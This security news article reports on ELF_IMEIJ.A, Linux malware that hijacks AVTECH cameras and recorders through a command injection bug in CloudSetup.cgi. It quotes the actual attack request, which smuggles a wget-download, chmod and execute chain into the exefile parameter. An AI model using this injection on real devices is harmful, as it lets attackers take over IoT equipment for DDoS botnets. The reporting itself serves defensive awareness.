New Linux malware hijacks one vendor’s IoT devices by exploiting CGI bug

If only the vendor would fix the issue…

David bisson
David Bisson

New Linux malware hijacks one vendor's IoT devices by exploiting CGI bug

A new form of Linux malware is hijacking Internet of Things (IoT) devices made by one vendor by exploiting a common gateway interface (CGI) vulnerability.

The ARM malware, detected by security software firm Trend Micro as “ELF_IMEIJ.A,” arrives in requests for information (RFI) in CGI bin scripts. Upon delivery, the remote attacker sends the following request to random IP addresses:

POST /cgi-bin/supervisor/CloudSetup.cgi?exefile=wget -O /tmp/Arm1;chmod 0777 /tmp/Arm1;/tmp/Arm1; HTTP/1.1

Sign up to our free newsletter.
Security news, advice, and tips.

Why, you might ask?

ELF_IMEIJ.A is looking to exploit an authenticated command injection vulnerability in devices made by AVTECH, a CCTV manufacturer, that specifically support CloudSetup.CGI.

Researchers at Search-Lab first discovered this vulnerability (along with several others) back in October 2015.

The problem is that there is not allow-list-based checking or verification for the exefile parameter of a CloudSetup.cgi, which specifies the system command to be executed. This bug therefore allows attackers to execute arbitrary commands with root privileges.

Trend Micro explains what ELF_IMEIJ.A can do once it’s exploited the hole:

“The points of entry for this new Linux malware are connected AVTech devices such as IP cameras, CCTV equipment, and network recorders that support the AVTech cloud. Once the malware is installed onto the device, it gathers system information and network activity data. It can also execute shell commands from the malicious actor, initiate Distributed Denial of Service (DDoS) attacks, and terminate itself. Infected devices also put other devices connected to the same network at risk.”

Linux malware 1
The infection flow of ELF_IMEIJ.A. (Source: Trend Micro)

Wait, distributed denial-of-service (DDoS) attacks? That sounds a lot like Mirai.

Well, it’s different in that its exploit code is specific to AVTECH, it operates on port 39999, (Mirai works with three: 7547, 5555, and 48101.) and it specifically seeks out devices with unsecured cgi-bin scripts instead of bruteforcing products with BusyBox software installed. But as AVTECH has almost 130,000 devices connected to the web, the potential for ELF_IMEIJ.A to cause a mess is real.

Unfortunately, there’s not much that can be done to patch these devices. Indeed, Search Lab reached out to AVTECH four times about the issue over the span of a year. When it never received a response, it disclosed the vulnerabilities publicly in October 2016.

Organizations can best protect their AVTECH products against ELF_IMEIJ.A by using security solutions that can monitor network protocols and Internet traffic for threats as well as proactively detect malware at the endpoint level.

David Bisson is an infosec news junkie and security journalist. He works as Contributing Editor for Graham Cluley Security News and Associate Editor for Tripwire's "The State of Security" blog.

One comment on “New Linux malware hijacks one vendor’s IoT devices by exploiting CGI bug”

  1. Neil Anuskiewicz

    Why do IoT devices need CGi support? Do they really deploy CGI scrips on these devices?

    Or is it a matter of not systematically disabling everything not needed to mitigate security risks? Or is there some other explanation?

What do you think? Leave a comment

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.